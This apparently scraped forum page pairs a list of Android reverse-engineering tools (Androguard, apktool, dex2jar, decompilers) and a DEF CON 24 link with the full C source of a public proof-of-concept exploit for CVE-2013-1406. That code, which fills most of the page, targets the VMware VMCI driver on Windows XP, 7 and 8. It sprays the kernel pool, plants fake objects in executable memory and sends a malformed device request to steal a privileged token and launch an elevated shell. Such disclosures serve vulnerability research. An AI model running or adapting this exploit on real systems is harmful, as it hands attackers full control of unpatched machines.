ANDROGUARD Androguard is a full python tool to play with Android files. DEX, ODEX APK Android’s binary xml Android resources Disassemble DEX/ODEX bytecodes Decompiler for DEX/ODEX files 4. APKTOOL A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with an app easier because of project-like file structure and automation of some repetitive tasks like building apk, etc. Features: Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png. and XMLs) Rebuilding decoded resources back to binary APK/JAR Organizing and handling APKs that depend on framework resources Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali) Helping with repetitive tasks 5. ANDROID FRAMEWORK FOR EXPLOITATION Android Framework for Exploitation is a framework for exploiting android based devices and applications. 6. BYPASS SIGNATURE AND PERMISSION CHECKS FOR IPCS This tool leverages Cydia Substrate to bypass signature and permission checks for IPCs. 7. ANDROID OPENDEBUG This tool leverages Cydia Substrate to make all applications running on the device debuggable; once installed any application will let a debugger attach to them. 8. DARE Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techniques developed for traditional Java applications. 9. DEX2JAR Tools to work with android .dex and java .class files. 10. ENJARIFY Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications. 11. DEDEXER Dedexer is a disassembler tool for DEX files. DEX is a format introduced by the creators of the Android platform. The format and the associated opcode set is in distant relationship with the Java class file format and Java bytecodes. Dedexer is able to read the DEX format and turn into an “assembly-like format”. This format was largely influenced by the Jasmin syntax but contains Dalvik opcodes. For this reason, Jasmin is not able to compile the generated files. 12. FINO An Android Dynamic Analysis Tool. 13. INDROID The aim of the project is to demonstrate that a simple debugging functionality on *nix systems a.k.a ptrace() can be abused by malware to inject malicious code in remote processes. Indroid provides CreateRemoteThread() equivalent for ARM based *nix devices. If you want to get a more deeper insight into the working of the framework you may: Watch the Defcon 19 video on Jugaad – http://www.youtube.com/watch?v=vju6tq1lp0k Read the paper – http://www.slideshare.net/null0x00/project-jugaad 14. INTENTSNIFFER Intent Sniffer is a tool that can be used on any device using the Google Android operating system (OS). On the Android OS, an Intent is description of an action to be performed, such as startService to start a service. The Intent Sniffer tool performs monitoring of runtime routed broadcasts Intents. It does not see explicit broadcast Intents, but defaults to (mostly) unprivileged broadcasts. There is an option to see recent tasks Intents (GET_TASKS), as Activity’s intents are visible when started. The tool can also dynamically update Actions & Categories. 15. INTROSPY Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues. 16. JAD Jad is a Java decompiler. 17. JD-GUI JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. 18. CFR CFR will decompile modern Java features – Java 8 lambdas (pre and post Java beta 103 changes), Java 7 String switches etc, but is written entirely in Java 6. 19. KRAKATAU Krakatau currently contains three tools – a decompiler and disassembler for Java classfiles and an assembler to create classfiles. 20. PROCYON While still incomplete, tests seem to indicate that the Procyon decompiler can generally hold its own against the other leading Java decompilers out there. 21. FERNFLOWER Fernflower is the first actually working analytical decompiler for Java. 22. REDEXER Redexer is a reengineering tool that manipulates Android app binaries. This tool is able to parse a DEX file into an in-memory data structure; to infer with which parameters the app uses certain permissions (we name this feature RefineDroid); to modify and unparse that data structure to produce an output DEX file (we name these features Dr. Android, which stands for Dalvik Rewriting for Android). 23. SIMPLIFY ANDROID DEOBFUSCATOR Simplify virtually executes an app to understand its behavior and then tries to optimize the code so that it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn’t matter what the specific type of obfuscation is used. 24. BYTECODE VIEWER Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. It’s written completely in Java, and it’s open sourced. It’s currently being maintained and developed by Konloch. There is also a plugin system that will allow you to interact with the loaded classfiles, for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM. 25. RADARE2 r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files. Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for reversing apks, analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, etc… Sursa: https://hackerlists.com/android-reverse-engineering-tools/

Prexentarile de la Defcon 2016. Link: https://media.defcon.org/DEF CON 24/DEF CON 24 presentations/

VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept /* CVE-2013-1406 exploitation PoC by Artem Shishkin, Positive Research, Positive Technologies, 02-2013 */ void __stdcall FireShell(DWORD dwSomeParam) { EscalatePrivileges(hProcessToElevate); // Equate the stack and quit the cycle #ifndef _AMD64_ __asm { pop ebx pop edi push 0xFFFFFFF8 push 0xA010043 } #endif } HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0) { HANDLE hResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr)) { hResult = pHandleTable->Handles[i].HandleValue; break; } } return hResult; } PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { PVOID pResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pResult = (HANDLE)pHandleTable->Handles[i].Object; break; } } return pResult; } void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pHandleTable->Handles[i].Object = NULL; pHandleTable->Handles[i].HandleValue = NULL; break; } } return; } void PoolSpray() { // Init used native API function lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { printf("Such a fail...\n"); return; } // Determine object size // xp: //const DWORD_PTR dwSemaphoreSize = 0x38; // 7: //const DWORD_PTR dwSemaphoreSize = 0x48; DWORD_PTR dwSemaphoreSize = 0; if (LOBYTE(GetVersion()) == 5) { dwSemaphoreSize = 0x38; } else if (LOBYTE(GetVersion()) == 6) { dwSemaphoreSize = 0x48; } unsigned int cycleCount = 0; while (cycleCount < 50000) { HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL); if (hTemp == NULL) { break; } ++cycleCount; } printf("\t[+] Spawned lots of semaphores\n"); printf("\t[.] Initing pool windows\n"); Sleep(2000); DWORD dwNeeded = 4096; NTSTATUS status = 0xFFFFFFFF; PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); while (true) { status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL); if (status != STATUS_SUCCESS) { dwNeeded *= 2; VirtualFree(pBuf, 0, MEM_RELEASE); pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE); } else { break; } }; HANDLE hHandlesToClose[0x30] = {0}; DWORD dwCurPID = GetCurrentProcessId(); PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf; for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) { if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) { DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object; DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue; DWORD_PTR dwWindowAddress = 0; bool bPoolWindowFound = false; UINT iObjectsNeeded = 0; // Needed window size is vmci packet pool chunk size (0x218) divided by // Semaphore pool chunk size (dwSemaphoreSize) iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0); if ( // Not on a page boundary ((dwTestObjAddr & 0xFFF) != 0) && // Doesn't cross page boundary (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) ) { // Check previous object for being our semaphore DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize; if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) { continue; } for (unsigned int j = 1; j < iObjectsNeeded; j++) { DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize); HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr); //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal); //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr); //printf("\tLooked up handle = %08X\n", hLookedUp); if (hLookedUp != NULL) { hHandlesToClose[j] = hLookedUp; if (j == iObjectsNeeded - 1) { // Now test the following object dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize); if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) { hHandlesToClose[0] = (HANDLE)dwTestHandleVal; bPoolWindowFound = true; dwWindowAddress = dwTestObjAddr; // Close handles to create a memory window for (int k = 0; k < iObjectsNeeded; k++) { if (hHandlesToClose[k] != NULL) { CloseHandle(hHandlesToClose[k]); CloseTableHandle(pHandleTable, hHandlesToClose[k]); } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } if (bPoolWindowFound) { printf("\t[+] Window found at %08X!\n", dwWindowAddress); } } } } VirtualFree(pBuf, 0, MEM_RELEASE); return; } void InitFakeBuf(PVOID pBuf, DWORD dwSize) { if (pBuf != NULL) { RtlFillMemory(pBuf, dwSize, 0x11); } return; } void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep) { /* Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043 So, for every 0xXXXX0043 address we must suffice the following conditions: lea edx, [eax+38h] lock xadd [edx], ecx cmp ecx, 1 Some sort of lock at [addr + 38] must be equal to 1. And call dword ptr [eax+0ACh] The call site is located at [addr + 0xAC] Also fake the object to be dereferenced at [addr + 0x100] */ if (pBuf != NULL) { for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) { PDWORD pLock = (PDWORD)(iAddr + 0x38); PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC); PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100); *pLock = 1; *pCallMeMayBe = (DWORD_PTR)FireShell; *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000; } } return; } void PenetrateVMCI() { /* VMware Security Advisory Advisory ID: VMSA-2013-0002 Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability Issue date: 2013-02-07 Updated on: 2013-02-07 (initial advisory) CVE numbers: CVE-2013-1406 */ DWORD dwPidToElevate = 0; HANDLE hSuspThread = NULL; bool bXP = (LOBYTE(GetVersion()) == 5); bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1)); bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2)); if (!InitKernelFuncs()) { printf("[-] Like I don't know where the shellcode functions are\n"); return; } if (bXP) { printf("[?] Who do we want to elevate?\n"); scanf_s("%d", &dwPidToElevate); hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate); if (hProcessToElevate == NULL) { printf("[-] This process doesn't want to be elevated\n"); return; } } if (b7 || b8) { // We are unable to change an active process token on-the-fly, // so we create a custom shell suspended (Ionescu hack) STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.wShowWindow = TRUE; WCHAR cmdPath[MAX_PATH] = {0}; GetSystemDirectory(cmdPath, MAX_PATH); wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe"); if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE) { hProcessToElevate = pi.hProcess; hSuspThread = pi.hThread; } } HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); if (hVMCIDevice != INVALID_HANDLE_VALUE) { UCHAR BadBuff[0x624] = {0}; UCHAR retBuf[0x624] = {0}; DWORD dwRet = 0; printf("[+] VMCI service found running\n"); PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff; pVmReq->Header.RequestSize = 0xFFFFFFF0; PVOID pShellSprayBufStd = NULL; PVOID pShellSprayBufQtd = NULL; PVOID pShellSprayBufStd7 = NULL; PVOID pShellSprayBufQtd7 = NULL; PVOID pShellSprayBufChk8 = NULL; if ((b7) || (bXP) || (b8)) { /* Significant bits of a PoolType of a chunk define the following regions: 0x0A000000 - 0x0BFFFFFF - Standard chunk 0x1A000000 - 0x1BFFFFFF - Quoted chunk 0x0 - 0xFFFFFFFF - Free chunk - no idea Addon for Windows 7: Since PoolType flags have changed, and "In use flag" is now 0x2, define an additional region for Win7: 0x04000000 - 0x06000000 - Standard chunk 0x14000000 - 0x16000000 - Quoted chunk */ pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL)) { printf("\t[-] Unable to map the needed memory regions, please try running the app again\n"); CloseHandle(hVMCIDevice); return; } InitFakeBuf(pShellSprayBufStd, 0x2000000); InitFakeBuf(pShellSprayBufQtd, 0x2000000); InitFakeBuf(pShellSprayBufStd7, 0x2000000); InitFakeBuf(pShellSprayBufQtd7, 0x2000000); PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000); if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) { SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST); } PoolSpray(); if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) { printf("\t[!] If you don't see any BSOD, you're successful\n"); if (b7 || b8) { ResumeThread(hSuspThread); } } else { printf("[-] Not this time %d\n", GetLastError()); } if (pShellSprayBufStd != NULL) { VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE); } if (pShellSprayBufQtd != NULL) { VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE); } } SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL); CloseHandle(hVMCIDevice); } else { printf("[-] Like I don't see vmware here\n"); } CloseHandle(hProcessToElevate); return; } Sursa: https://www.exploit-db.com/exploits/40164/